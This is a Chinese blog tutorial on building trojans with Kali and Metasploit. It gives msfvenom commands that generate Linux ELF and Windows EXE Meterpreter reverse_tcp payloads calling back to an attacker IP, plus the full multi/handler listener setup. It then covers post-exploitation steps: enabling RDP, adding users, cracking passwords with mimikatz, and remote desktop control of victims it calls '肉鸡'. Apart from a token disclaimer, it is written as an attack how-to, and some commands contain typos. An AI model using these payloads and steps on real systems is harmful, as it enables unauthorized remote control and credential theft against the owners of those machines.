声明:禁止用作非法目的,谢绝一切形式的转载。

当你在无意间点击一个链接后,当你在不明情况安装一个程序时,当你忍不住点击一个美女图片的时候,你的设备可能就此沦陷了,成为了黑客眼中的"肉鸡"。

文章目录

  • kali Linux
  • Metersploit
  • Meterpreter
  • Linux攻击
    • 生成木马
    • 开启监听
    • 攻击效果
  • Windows攻击
    • 生成木马
    • 开启监听
    • 攻击效果
      • 桌面截图
      • 开启远程桌面
        • 添加用户
      • 帐号密码破解
      • 远程桌面
  • 公众号

kali Linux

Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。

Metersploit

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

Meterpreter

Meterpreter是 Metasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击使用, 攻击触发发漏洞后能够返回给我们一个控制通道.

Linux攻击

生成木马

网络上有好多生成木马的方式,但是大多数都是相互copy,甚至有的还可能包含病毒,谨慎使用。网络上下载的所有软件都要慎用,除非是在官网上下载的。
生成一个使用于Lnux 64位系统的木马,生成木马的命令如下:

msfvenom -a x64 --platform linux  -p linux/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=5555  -i 3 -f elf -o test

LHOST 代表Listening host。LPORT代表Listening port。后续介绍网络的时候会详细讲解。

翻译一下这个命令:平台Linux x64架构,使用payload是linux/x64/meterpreter/reverse_tcp,目标文件的格式是elf。可执行目标文件的名称是test。
通过上面的命令,我们就就可以生成一个elf格式的test程序,当在远端(也就是"肉鸡")执行这个程序的时候,如果本地开启了监听,肉鸡和本机之间就建立了一条通信的channel,通过这个木马就能实现控制远端的肉鸡了,邪恶的微笑。

开启监听

  1. 开启msf
msfconsole
  1. 加载模块
msf5 > use exploit/multi/handler
  1. 设置payload
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
  1. 设置监听ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
  1. 设置监听port
msf5 exploit(multi/handler) > set LPORT 5555
  1. 执行
msf5 exploit(multi/handler) > exploit

攻击效果

当执行完exploit之后,我们可以获得一个Meterpreter。通过这个meterpreter,可以查看肉鸡中的文件,进程等。
可以开启一个shell,这样基本等同于完全操控目标计算机了。

通过查看whoami可知正是当前登陆用户的帐号。如何提升权限,后续会介绍。

Windows攻击

生成木马

msfvenom -a x64 --platform windows  -p windows/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=4444  -i 3 -f exe -o payload_test.exe

具体含义可参考上文。

开启监听

  1. 开启msf
msfconsole
  1. 加载模块
msf5 > use exploit/multi/handler
  1. 设置payload
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  1. 设置监听ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
  1. 设置监听port
msf5 exploit(multi/handler) > set LPORT 4444
  1. 执行
msf5 exploit(multi/handler) > exploit

攻击效果

当执行完exploit之后,我们可以获得一个Meterpreter。通过这个meterpreter,可以查看肉鸡中的文件,进程等。同Linux。
查看那getuid是Administrator,管理员权限。在Windows下,这还不是最高的权限,最高的权限是system,至于如何提权,后续会讲解。

开启一个shell,发现有乱码,这是由于Linux和Windows采用的编码方式不一致导致的。可以通过chcp 65001解决这个问题。

桌面截图

开启远程桌面

通过以下命令开启rdp服务

run post/windows/manager/enable_rdp

如图:

添加用户

帐号密码破解

使用minikatz进行密码破解

远程桌面

通过rdestop 目标ip -u 账户,可以实现远程桌面的控制。

公众号

了解更多网络安全内容,欢迎关注我的公众号:无情剑客

黑客攻击-木马程序(1)相关推荐

  1. 黑客攻击-木马程序(2)

    声明:本篇内容禁止用作非法目的,谢绝一切形式的转载 当你在登陆电脑的时候,当你在登陆淘宝的时候,当你在登陆微信的时候,你的输入可能正在被记录,然后电脑的登陆密码.微信帐号密码.淘宝的帐号密码就这样在不 ...

  2. 探秘网络背后黑产链:黑客攻击木马病毒机构内鬼防不胜防

    电子商务.移动支付的普及,消费者越来越少随身携带现金,人们打趣道"小偷都快失业了". 但在互联网上,靠盗窃用户电子账户资金.虚拟资产的"网络小偷"却十分猖獗. ...

  3. 黑客攻击-木马免杀之PE文件

    当你好不容易弄出来一个木马(具体可参考这里)的时候,却被杀毒软件轻易的就检测出来了,那一切岂不是白费了.Win10中的windows defender基于流量检测很容易把常见的木马程序检测出来,那怎么 ...

  4. 警方通报西北工业大学遭境外黑客攻击,敲响网络安全警钟

    警方通报西北工业大学遭境外黑客攻击,敲响网络安全警钟 西北工业大学电子邮件系统近期发现一批以科研评审.答辩邀请和出国通知等为主题的钓鱼邮件,内含木马程序,引诱部分师生点击链接,非法获取师生电子邮箱登录 ...

  5. 八成网银存在安全隐患 360安全卫士拿“木马程序”开刀

    八成网银存在安全隐患 360安全卫士拿"木马程序"开刀 2006年,辽宁一男子通过工行网上银行盗窃42万多元后"人间蒸发":2006年9月,淘宝网一位卖家在短短 ...

  6. 移动银行木马活跃度升级 恐成黑客攻击跳板

    近日,亚信安全网络安全监测实验室在监测统计分析中发现,移动恶意软件呈现爆发趋势,银行木马威胁尤为严重,这与当下贪婪的不法分子追逐金钱实质利益息息相关.其中一种被命名为"Svpeng" ...

  7. python编写木马攻击_用Python写一个自动木马程序

    电脑作为大家日常办公的工具,最怕的一件事情之一就是被偷,当我们的电脑被盗的时候,不仅仅是电脑本身,更重要的是电脑存储的资料都会丢失.如何尽快的找回电脑需要我们想点办法,今天就教大家一个好的技巧,虽说不 ...

  8. 黑客攻防技术宝典Web实战篇第2版—第11章 攻击应用程序逻辑

    11.1 逻辑缺陷的本质 1.一般逻辑缺陷表现为设计者或者开发者在思考过程中做出的特殊假设存在明显或者隐含的错误. 11.2 现实中的逻辑缺陷 11.2.1 例1:征求提示 1.功能:如"记 ...

  9. python编写木马攻击_Python编写简易木马程序

    Python编写简易木马程序 0x00 准备 文章内容仅供学习研究.切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录.截屏以及通信功能的简易木马.依然选用Sublime text2 + ...

最新文章

  1. emacs Linux Java编程环境_Linux下搭建用emacs查看代码的开发环境
  2. Python 获 Mozilla 和扎克伯格夫妇 40 余万美金资助
  3. 单片机GPIO软件模拟I2C通讯程序
  4. 深入剖析全链路灰度技术
  5. 灵魂拷问,上 Kubernetes 有什么业务价值?
  6. Linux虚拟机挂载共享文件夹
  7. Java中ArrayList类的用法
  8. base64解密后乱码_php实现php代码的加密解密
  9. ubuntu挂载移动硬盘出现错误:mount:unknown filesystem type ‘exfat‘
  10. Matlab图像分割---使用主动轮廓 (snake) 方法进行图像分割
  11. Python漫画下载器V2,进行更好的封装,更高效的多线程与刷新机制
  12. java 值类型与引用类型_Java值类型和引用类型的区别
  13. Kata3.0.0 x LifseaOS x 龙蜥内核三管齐下!带你体验最新的安全容器之旅
  14. 湖南大学计算机学院陈浩,杨圣洪-湖大信息科学与工程学院
  15. 差速小车的Cartographer建图
  16. raspberrypi三天玩能人脸识别
  17. 黑窗口方式,使用命令行导入导出Oracle
  18. MIT线性代数笔记十七讲 正交矩阵和施密特正交化
  19. 浅析嵌入式系统的发展趋势
  20. JS中的new操作符原理解析

热门文章

  1. Unity3D 布料系统 And Cloth Constraint 及 Mesh双面渲染
  2. 网站安全狗Nginx版V2.0发布 全方位防护网站安全
  3. 国产chatgpt:基于chatGLM微调nlp信息抽取任务
  4. 文献笔记02 网络入侵检测技术综述(信息安全学报)
  5. 系统资源是什么,以及线程什么时候不会释放 共享资源
  6. 软件测试流程之产品如何提测?提测清单模板分享
  7. openwrt目录结构
  8. 如何使用 parentNode 来获取一个或多个 HTML 元素.
  9. centos rpmforge repo
  10. RTE 2022 行业日亮点前瞻:实时互动激活场景创造力